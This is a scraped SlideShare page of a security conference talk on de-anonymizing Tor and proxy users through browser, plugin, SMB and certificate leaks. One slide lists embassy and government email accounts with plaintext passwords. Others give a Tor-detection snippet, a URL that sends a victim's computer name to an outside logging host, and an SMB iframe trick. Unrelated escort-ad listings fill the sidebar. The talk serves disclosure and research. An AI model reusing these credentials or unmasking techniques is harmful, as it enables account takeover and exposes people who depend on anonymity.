SlideShare ist ein Scribd-Unternehmen logo
1 von 25
1 Your logo here…
About Us ,[object Object]
SecTheory LLC - CEO
http://www.sectheory.com
http://ha.ckers.org – the lab
http://sla.ckers.org – the forum
Joshua “Jabra”Abraham
Rapid7 LLC - Security Researcher
http://www.rapid7.com
http://blog.spl0it.org2
De-Anonymizing You! 3 Why does this matter? Privacy advocacy People think they’re safe Privacy is not a guarantee.  It can be taken from you. True anonymity is actually extremely difficult to achieve!! So we decided to attack users instead of websites for once.
Why is Privacy Good? 4 Safety from trolls who want to drop docs Safer for political dissidents Safer for potential victims of violent crimes (women, children)… Allows people to be themselves (for good or bad) Safer for whistle blowers Increases freedoms
Why is Privacy Bad? 5 Haven for “evildoers” Allows them to attack easily Allows them to retreat easily Allows them to exfiltrate data easily Hurts law enforcement Prevents “social compact” rules of order from working in online contexts.
Either Way, Privacy is Broken 6 The ecosystem is too complex IP is the “gold standard” for tracking people down on the Internet, but what if we could do better? Let’s start with the basics of how people anonymize themselves.
How2 7 Basic anonymization guide Proxies: CGI proxies SOCKS Proxies Tor Hacked machines Freemail Hotmail Gmail Hushmail
Client Side Certificates 8 Good/Normal Use Improving the trust model Client: has the cert in the browser Servers: requires all clients have valid certs What if the client goes to another website with SSL? Browser defaults to send the public key
Client Side Certificates Well, could this be malicious? Sniff the public key Name of the system System/OS Username/Email of the client Location of the server Cert Issued / Expires 9 https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png
Funny thing about usernames they often look like this: Common usernames: Administrator root [first].[last] [first]_[last] [first]-[last] handle … full name of the victim Interesting more on this later….
Breaking Tor 11 Kazakhstan Embassy in Egypt 213.131.64.229 kazaembpiramid Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk-np.com Password Defense Research & Development Organization Govt. Of India, Ministry of Defense jpsingh@drdo.com password+1 Indian Embassy in USA amb@indianembassy.org 1234 Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir accra Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir kenya Hong Kong Liberal Party 202.123.79.164 miriamlau 123456 100 embassy passwords Breach proxy honeypots Open Proxies you trust? HackedTor.exe Setup the Client Tor node just logs everything We can play MiTM like Jay <imgsrc="http://dige6xxwpt2knqbv.onion/wink.gif" onload="alert('You are using Tor')" onerror="alert('You are not using tor')">
Browser Detection 12 Mr T Plugins History Screen Resolution BeEF VMware detection (IE only) Plugin detection  (Java, Flash and Quicktime) Setup script in Backtrack4 But…. The Cloud is the new Hotness!
Virtualization/Cloud Detection 13 VM Detection VMware QEMU VirtualBox Amazon EC2 Detection Identify each region Works on: Firefox and IE 6, 7 and 8 Works on Linux and Windows  Mac doesn’t work - 64 bit issue New BeEF Module! Leverage this knowledge in our attacks
Pwn Dem v0hns 14 Java on the client Malicious Java Applet Client running old/vulnerable software: Plugin and/or Browser  Metasploit exploit
BeEF to the MAX! New BeEF Modules TOR detection VM detection (Vmware, QEMU, VirtualBox and EC2) AJAX “Ping” Sweep Java Metasploit Payload Applet BeEFMetasploit Integration Autopwn / New Browser 0day Updated BeEF Modules Visited URLs (Alexa top 500) New version of BeEF coming… http://www.bindshell.net/beef 15
Real IP 16 Java Java internal IP Flash scp:// (winSCP) Word/pdf bugs itms: Already part of decloak.net
File System Enumeration 17 res:// timing res:// timing without JavaScript smbenum - “Wtf?”

Weitere ähnliche Inhalte

Andere mochten auch

Quest Language Studies pp
Quest Language Studies ppQuest Language Studies pp
Quest Language Studies ppQuest
 
Visualize Life Without Boundaries!
Visualize Life Without Boundaries!Visualize Life Without Boundaries!
Visualize Life Without Boundaries!rriddick2
 
State Highway 6 Corridor Overlay Presentation 20090803
State Highway 6 Corridor Overlay Presentation   20090803State Highway 6 Corridor Overlay Presentation   20090803
State Highway 6 Corridor Overlay Presentation 20090803City of Manvel
 
090727 Final HMU Options
090727  Final HMU Options090727  Final HMU Options
090727 Final HMU OptionsCity of Manvel
 
Quest 2010 Brochure - English
Quest 2010 Brochure - EnglishQuest 2010 Brochure - English
Quest 2010 Brochure - EnglishQuest
 
Arabic brochure 2010
Arabic brochure 2010Arabic brochure 2010
Arabic brochure 2010Quest
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.guest18a06f7
 

Andere mochten auch (19)

Quest Language Studies pp
Quest Language Studies ppQuest Language Studies pp
Quest Language Studies pp
 
Visualize Life Without Boundaries!
Visualize Life Without Boundaries!Visualize Life Without Boundaries!
Visualize Life Without Boundaries!
 
State Highway 6 Corridor Overlay Presentation 20090803
State Highway 6 Corridor Overlay Presentation   20090803State Highway 6 Corridor Overlay Presentation   20090803
State Highway 6 Corridor Overlay Presentation 20090803
 
090727 Final HMU Options
090727  Final HMU Options090727  Final HMU Options
090727 Final HMU Options
 
Quest 2010 Brochure - English
Quest 2010 Brochure - EnglishQuest 2010 Brochure - English
Quest 2010 Brochure - English
 
Arabic brochure 2010
Arabic brochure 2010Arabic brochure 2010
Arabic brochure 2010
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.Asortimento valdymas mazmenoje.
Asortimento valdymas mazmenoje.
 
Presentacion Rss
Presentacion RssPresentacion Rss
Presentacion Rss
 

Ähnlich wie Unmasking You

Data Privacy for Activists
Data Privacy for ActivistsData Privacy for Activists
Data Privacy for ActivistsGreg Stromire
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouE Hacking
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Securityeugenet
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet SecurityAshley Zimmerman
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet SecurityJFashant
 
The Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe OnlineThe Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe OnlineJinger Jarrett
 
Social Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus NetworkSocial Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus Networkthowell
 
Year 7 - Week 5 esafety
Year 7 - Week 5   esafetyYear 7 - Week 5   esafety
Year 7 - Week 5 esafetyteachesict
 
Internet Safety & Security
Internet Safety & Security Internet Safety & Security
Internet Safety & Security Austin Stroud
 
hamad.pwrpoint.pdf
hamad.pwrpoint.pdfhamad.pwrpoint.pdf
hamad.pwrpoint.pdfhmooodes115
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleJarrod Overson
 
Cyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdfCyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdfCyberhunter Cyber Security
 
Protecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World SafetyProtecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World SafetyAEGILITY
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Programdavidcurriecia
 
Passwords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim SalterPasswords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim SalterIT-oLogy
 
Os Nightingale
Os NightingaleOs Nightingale
Os Nightingaleoscon2007
 
Protect Yourself From Internet Pests
Protect Yourself From Internet PestsProtect Yourself From Internet Pests
Protect Yourself From Internet Pestspeterhitch
 

Ähnlich wie Unmasking You (20)

Data Privacy for Activists
Data Privacy for ActivistsData Privacy for Activists
Data Privacy for Activists
 
Unmasking or De-Anonymizing You
Unmasking or De-Anonymizing YouUnmasking or De-Anonymizing You
Unmasking or De-Anonymizing You
 
OpenID Security
OpenID SecurityOpenID Security
OpenID Security
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet Security
 
Computer And Internet Security
Computer And Internet SecurityComputer And Internet Security
Computer And Internet Security
 
The Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe OnlineThe Veterans' Guide to Protecting Your Privacy and Staying Safe Online
The Veterans' Guide to Protecting Your Privacy and Staying Safe Online
 
Social Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus NetworkSocial Engineering: Protecting Yourself on the Campus Network
Social Engineering: Protecting Yourself on the Campus Network
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 
Year 7 - Week 5 esafety
Year 7 - Week 5   esafetyYear 7 - Week 5   esafety
Year 7 - Week 5 esafety
 
Security Primer
Security PrimerSecurity Primer
Security Primer
 
Internet Safety & Security
Internet Safety & Security Internet Safety & Security
Internet Safety & Security
 
hamad.pwrpoint.pdf
hamad.pwrpoint.pdfhamad.pwrpoint.pdf
hamad.pwrpoint.pdf
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycle
 
Cyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdfCyberhunter solutions cyber security toronto.pdf
Cyberhunter solutions cyber security toronto.pdf
 
Protecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World SafetyProtecting Your Privacy: Cyberspace Security, Real World Safety
Protecting Your Privacy: Cyberspace Security, Real World Safety
 
Employee Security Awareness Program
Employee Security Awareness ProgramEmployee Security Awareness Program
Employee Security Awareness Program
 
Passwords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim SalterPasswords in the Internet Age - Jim Salter
Passwords in the Internet Age - Jim Salter
 
Os Nightingale
Os NightingaleOs Nightingale
Os Nightingale
 
Protect Yourself From Internet Pests
Protect Yourself From Internet PestsProtect Yourself From Internet Pests
Protect Yourself From Internet Pests
 

Kürzlich hochgeladen

Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Roland Driesen
 
Call Girls in Gomti Nagar - 7388211116 - With room Service
Call Girls in Gomti Nagar - 7388211116  - With room ServiceCall Girls in Gomti Nagar - 7388211116  - With room Service
Call Girls in Gomti Nagar - 7388211116 - With room Servicediscovermytutordmt
 
VIP Kolkata Call Girl Howrah 👉 8250192130 Available With Room
VIP Kolkata Call Girl Howrah 👉 8250192130  Available With RoomVIP Kolkata Call Girl Howrah 👉 8250192130  Available With Room
VIP Kolkata Call Girl Howrah 👉 8250192130 Available With Roomdivyansh0kumar0
 
Regression analysis: Simple Linear Regression Multiple Linear Regression
Regression analysis:  Simple Linear Regression Multiple Linear RegressionRegression analysis:  Simple Linear Regression Multiple Linear Regression
Regression analysis: Simple Linear Regression Multiple Linear RegressionRavindra Nath Shukla
 
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...
BEST ✨ Call Girls In  Indirapuram Ghaziabad  ✔️ 9871031762 ✔️ Escorts Service...BEST ✨ Call Girls In  Indirapuram Ghaziabad  ✔️ 9871031762 ✔️ Escorts Service...
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...noida100girls
 
Mondelez State of Snacking and Future Trends 2023
Mondelez State of Snacking and Future Trends 2023Mondelez State of Snacking and Future Trends 2023
Mondelez State of Snacking and Future Trends 2023Neil Kimberley
 
DEPED Work From Home WORKWEEK-PLAN.docx
DEPED Work From Home  WORKWEEK-PLAN.docxDEPED Work From Home  WORKWEEK-PLAN.docx
DEPED Work From Home WORKWEEK-PLAN.docxRodelinaLaud
 
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999Tina Ji
 
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...Lviv Startup Club
 
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature SetCreating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature SetDenis Gagné
 
Keppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update  Presentation SlidesKeppel Ltd. 1Q 2024 Business Update  Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation SlidesKeppelCorporation
 
Pharma Works Profile of Karan Communications
Pharma Works Profile of Karan CommunicationsPharma Works Profile of Karan Communications
Pharma Works Profile of Karan Communicationskarancommunications
 
Catalogue ONG NƯỚC uPVC - HDPE DE NHAT.pdf
Catalogue ONG NƯỚC uPVC - HDPE DE NHAT.pdfCatalogue ONG NƯỚC uPVC - HDPE DE NHAT.pdf
Catalogue ONG NƯỚC uPVC - HDPE DE NHAT.pdfOrient Homes
 
GD Birla and his contribution in management
GD Birla and his contribution in managementGD Birla and his contribution in management
GD Birla and his contribution in managementchhavia330
 
RE Capital's Visionary Leadership under Newman Leech
RE Capital's Visionary Leadership under Newman LeechRE Capital's Visionary Leadership under Newman Leech
RE Capital's Visionary Leadership under Newman LeechNewman George Leech
 
Sales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for SuccessSales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for SuccessAggregage
 
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best ServicesMysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best ServicesDipal Arora
 
VIP Call Girl Jamshedpur Aashi 8250192130 Independent Escort Service Jamshedpur
VIP Call Girl Jamshedpur Aashi 8250192130 Independent Escort Service JamshedpurVIP Call Girl Jamshedpur Aashi 8250192130 Independent Escort Service Jamshedpur
VIP Call Girl Jamshedpur Aashi 8250192130 Independent Escort Service JamshedpurSuhani Kapoor
 

Kürzlich hochgeladen (20)

Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...Ensure the security of your HCL environment by applying the Zero Trust princi...
Ensure the security of your HCL environment by applying the Zero Trust princi...
 
Call Girls in Gomti Nagar - 7388211116 - With room Service
Call Girls in Gomti Nagar - 7388211116  - With room ServiceCall Girls in Gomti Nagar - 7388211116  - With room Service
Call Girls in Gomti Nagar - 7388211116 - With room Service
 
VIP Kolkata Call Girl Howrah 👉 8250192130 Available With Room
VIP Kolkata Call Girl Howrah 👉 8250192130  Available With RoomVIP Kolkata Call Girl Howrah 👉 8250192130  Available With Room
VIP Kolkata Call Girl Howrah 👉 8250192130 Available With Room
 
Regression analysis: Simple Linear Regression Multiple Linear Regression
Regression analysis:  Simple Linear Regression Multiple Linear RegressionRegression analysis:  Simple Linear Regression Multiple Linear Regression
Regression analysis: Simple Linear Regression Multiple Linear Regression
 
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...
BEST ✨ Call Girls In  Indirapuram Ghaziabad  ✔️ 9871031762 ✔️ Escorts Service...BEST ✨ Call Girls In  Indirapuram Ghaziabad  ✔️ 9871031762 ✔️ Escorts Service...
BEST ✨ Call Girls In Indirapuram Ghaziabad ✔️ 9871031762 ✔️ Escorts Service...
 
Mondelez State of Snacking and Future Trends 2023
Mondelez State of Snacking and Future Trends 2023Mondelez State of Snacking and Future Trends 2023
Mondelez State of Snacking and Future Trends 2023
 
DEPED Work From Home WORKWEEK-PLAN.docx
DEPED Work From Home  WORKWEEK-PLAN.docxDEPED Work From Home  WORKWEEK-PLAN.docx
DEPED Work From Home WORKWEEK-PLAN.docx
 
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
Russian Faridabad Call Girls(Badarpur) : ☎ 8168257667, @4999
 
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
Yaroslav Rozhankivskyy: Три складові і три передумови максимальної продуктивн...
 
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature SetCreating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
Creating Low-Code Loan Applications using the Trisotech Mortgage Feature Set
 
Forklift Operations: Safety through Cartoons
Forklift Operations: Safety through CartoonsForklift Operations: Safety through Cartoons
Forklift Operations: Safety through Cartoons
 
KestrelPro Flyer Japan IT Week 2024 (English)
KestrelPro Flyer Japan IT Week 2024 (English)KestrelPro Flyer Japan IT Week 2024 (English)
KestrelPro Flyer Japan IT Week 2024 (English)
 
Keppel Ltd. 1Q 2024 Business Update Presentation Slides
Keppel Ltd. 1Q 2024 Business Update  Presentation SlidesKeppel Ltd. 1Q 2024 Business Update  Presentation Slides
Keppel Ltd. 1Q 2024 Business Update Presentation Slides
 
Pharma Works Profile of Karan Communications
Pharma Works Profile of Karan CommunicationsPharma Works Profile of Karan Communications
Pharma Works Profile of Karan Communications
 
Catalogue ONG NƯỚC uPVC - HDPE DE NHAT.pdf
Catalogue ONG NƯỚC uPVC - HDPE DE NHAT.pdfCatalogue ONG NƯỚC uPVC - HDPE DE NHAT.pdf
Catalogue ONG NƯỚC uPVC - HDPE DE NHAT.pdf
 
GD Birla and his contribution in management
GD Birla and his contribution in managementGD Birla and his contribution in management
GD Birla and his contribution in management
 
RE Capital's Visionary Leadership under Newman Leech
RE Capital's Visionary Leadership under Newman LeechRE Capital's Visionary Leadership under Newman Leech
RE Capital's Visionary Leadership under Newman Leech
 
Sales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for SuccessSales & Marketing Alignment: How to Synergize for Success
Sales & Marketing Alignment: How to Synergize for Success
 
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best ServicesMysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
Mysore Call Girls 8617370543 WhatsApp Number 24x7 Best Services
 
VIP Call Girl Jamshedpur Aashi 8250192130 Independent Escort Service Jamshedpur
VIP Call Girl Jamshedpur Aashi 8250192130 Independent Escort Service JamshedpurVIP Call Girl Jamshedpur Aashi 8250192130 Independent Escort Service Jamshedpur
VIP Call Girl Jamshedpur Aashi 8250192130 Independent Escort Service Jamshedpur
 

Unmasking You

  • 1. 1 Your logo here…
  • 2.
  • 8. Rapid7 LLC - Security Researcher
  • 11. De-Anonymizing You! 3 Why does this matter? Privacy advocacy People think they’re safe Privacy is not a guarantee. It can be taken from you. True anonymity is actually extremely difficult to achieve!! So we decided to attack users instead of websites for once.
  • 12. Why is Privacy Good? 4 Safety from trolls who want to drop docs Safer for political dissidents Safer for potential victims of violent crimes (women, children)… Allows people to be themselves (for good or bad) Safer for whistle blowers Increases freedoms
  • 13. Why is Privacy Bad? 5 Haven for “evildoers” Allows them to attack easily Allows them to retreat easily Allows them to exfiltrate data easily Hurts law enforcement Prevents “social compact” rules of order from working in online contexts.
  • 14. Either Way, Privacy is Broken 6 The ecosystem is too complex IP is the “gold standard” for tracking people down on the Internet, but what if we could do better? Let’s start with the basics of how people anonymize themselves.
  • 15. How2 7 Basic anonymization guide Proxies: CGI proxies SOCKS Proxies Tor Hacked machines Freemail Hotmail Gmail Hushmail
  • 16. Client Side Certificates 8 Good/Normal Use Improving the trust model Client: has the cert in the browser Servers: requires all clients have valid certs What if the client goes to another website with SSL? Browser defaults to send the public key
  • 17. Client Side Certificates Well, could this be malicious? Sniff the public key Name of the system System/OS Username/Email of the client Location of the server Cert Issued / Expires 9 https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png
  • 18. Funny thing about usernames they often look like this: Common usernames: Administrator root [first].[last] [first]_[last] [first]-[last] handle … full name of the victim Interesting more on this later….
  • 19. Breaking Tor 11 Kazakhstan Embassy in Egypt 213.131.64.229 kazaembpiramid Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk-np.com Password Defense Research & Development Organization Govt. Of India, Ministry of Defense jpsingh@drdo.com password+1 Indian Embassy in USA amb@indianembassy.org 1234 Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir accra Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir kenya Hong Kong Liberal Party 202.123.79.164 miriamlau 123456 100 embassy passwords Breach proxy honeypots Open Proxies you trust? HackedTor.exe Setup the Client Tor node just logs everything We can play MiTM like Jay <imgsrc="http://dige6xxwpt2knqbv.onion/wink.gif" onload="alert('You are using Tor')" onerror="alert('You are not using tor')">
  • 20. Browser Detection 12 Mr T Plugins History Screen Resolution BeEF VMware detection (IE only) Plugin detection (Java, Flash and Quicktime) Setup script in Backtrack4 But…. The Cloud is the new Hotness!
  • 21. Virtualization/Cloud Detection 13 VM Detection VMware QEMU VirtualBox Amazon EC2 Detection Identify each region Works on: Firefox and IE 6, 7 and 8 Works on Linux and Windows Mac doesn’t work - 64 bit issue New BeEF Module! Leverage this knowledge in our attacks
  • 22. Pwn Dem v0hns 14 Java on the client Malicious Java Applet Client running old/vulnerable software: Plugin and/or Browser Metasploit exploit
  • 23. BeEF to the MAX! New BeEF Modules TOR detection VM detection (Vmware, QEMU, VirtualBox and EC2) AJAX “Ping” Sweep Java Metasploit Payload Applet BeEFMetasploit Integration Autopwn / New Browser 0day Updated BeEF Modules Visited URLs (Alexa top 500) New version of BeEF coming… http://www.bindshell.net/beef 15
  • 24. Real IP 16 Java Java internal IP Flash scp:// (winSCP) Word/pdf bugs itms: Already part of decloak.net
  • 25. File System Enumeration 17 res:// timing res:// timing without JavaScript smbenum - “Wtf?”
  • 26. Usernames and Computer Names! 18 But seriously – that’s just terrible, let’s just get the username and computer name directly! Cut and paste http://ha.ckers.org/log.cgi?rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz SMB <iframesrc="file:///2.2.2.2amp;quot;> </iframe>
  • 27. SMBenum 19 SMB enum only finds certain types of files and only if known prior to testing SMB enum could also gather usernames through brute force Usernames + res:// timing could gather programs that smbenum alone couldn’t
  • 33.
  • 36.
  • 39. Final version of Slides and Demos

Hinweis der Redaktion

  1. Jabra (maybe need a picture)
  2. Jabra and time check
  3. Robert & Jabra says Google is big brother